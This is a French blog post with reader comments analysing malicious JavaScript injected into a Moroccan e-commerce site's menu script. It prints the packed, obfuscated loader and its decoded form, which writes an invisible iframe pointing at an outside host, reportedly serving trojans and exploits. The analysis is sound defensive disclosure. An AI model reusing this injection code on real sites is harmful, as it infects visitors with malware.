En tentant de trouver un routeur Wifi sur digitalmall.ma j’étais surpris par un message de mon navigateur indiquant que le site est infecté est à été bloqué, une petite recherche sur Google montre que le site est dangereux ce qui signifie qu’il est infectée par un Virus,Trojan,Malwar .
Après quelques analyses: le script « w**.digitalmall.ma/dm/themes/default/css/menud.js » chargé par le site contient un script malveillant crypté qui charge le code suivant :
Code crypté :
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g')
,k[c])}}return p}('g 7=b 5(),4=b 5(7.k()+l);2(0.9.6("8=f")==-1)
{2(i.m.6("a")!=-1){3="3"}0.c("<"+3+" d"+"h=1 e"+"j=1 w=\'h"+"n: //y"+"z-v.u/p"+"/\' o=\'q"+"r:t\'>");0.9="8=f;"+" 4="+4.x()+"; "}',36,36,'document||if|iframe|expires|Date|indexOf|today|_df|cookie||
new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|
ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng'.
split('|'),0,{}));
Code Décrypté :
var today = new Date(),
expires = new Date(today.getTime() + 2678400000);
if (document.cookie.indexOf("_df=f") == -1) {
if (navigator.appCodeName.indexOf("a") != -1) {
iframe = "iframe"
}
document.write("<" + iframe + " widt" + "h=1 heig" + "ht=1 src='h" + "ttp://loadi" + "ng-atm.net/b2b" + "/' style='dis" + "play:none'>");document.cookie = "_df=f;" +
" expires=" + expires.toGMTString() + "; "
}
Le script crée une iframe invisible sur la page pour télécharger 14 trojan et tenté d’exploiter 26 exploit hébergé sur le site loading-atm.net qui a infecté 807 domaines dont s-shabab.co*, salamway.c**, ym-love.co* ,7ayaaty.co*, kwdownloads.co*, asraral3yon.co*.
Il semble que digitalmall.ma n’a pas pu trouver où corriger les vulnérabilités qui ont causés son défacage et maintenant le site présente un danger pour les visiteurs.
Les attaques de ce type sont encore rares sur les sites marocains due à un manque de développement des sites marchands et un manque d’intérêt des cybercriminels , qui commence appartement à se développer sur une plateforme web marocaine très vulnérables .
ITS SHAME ;The webmaster is having eid lolz 🙂
Chaque mois tu nous exposes sur ton blog une multitude d\’actes malveillants, touchant des sites marocain.
Je pense qu\’aujourd\’hui tout le monde, ou du moins ceux qui suivent ton blog, sont conscients que la sécurité des sites marocain est dans un très sale état.
La question que je me pose, c\’est que faire (nous les experts sécurité) pour remonter le niveau et éviter que le web marocain, soit un nid à pirates et d\’insécurité?
Bien que je n\’approuve pas ces attaques, je pense qu\’elles ont le mérite te montrer aux administrateurs et aux développeurs marocains à quel point les questions de sécurité doivent être prises au sérieux. D\’une certaine manière ces attaques servent le Maroc et l\’encouragent à hausser son niveau de sécurité. Selon moi, les actions à entreprendre pour hausser le niveau de sécurité de l\’information au Maroc sont les suivantes :
* La mise en oeuvre de formations d\’excellence dans le domaine de la sécurité de l\’information (formations techniques ET managériales).
* La sensibilisation des entreprises à travers l\’organisation de colloques et de séminaires sur la sécurité de l\’information.
* La mise en place d\’une agence gouvernementale garante de la sécurité informatique des institutions marocaines.
* Le développement de partenariats entre l\’agence et les entreprises marocaines (newsletter, bulletins d\’alerte, formations, audits,…).
* Le renforcement de l\’arsenal législatif marocain pour dissuader les personnes commettant des actes de fraude informatique sans toutefois décourager les utilisateurs bienveillants.
Enfin, ceci n\’est que mon avis perso.
Oui je me rappel l’automne dernier de ce message, je n’ai plus visité le site jusqu’à aujourd’hui, et devinez quoi? le site est inaccesible suite a une attaque peut être?!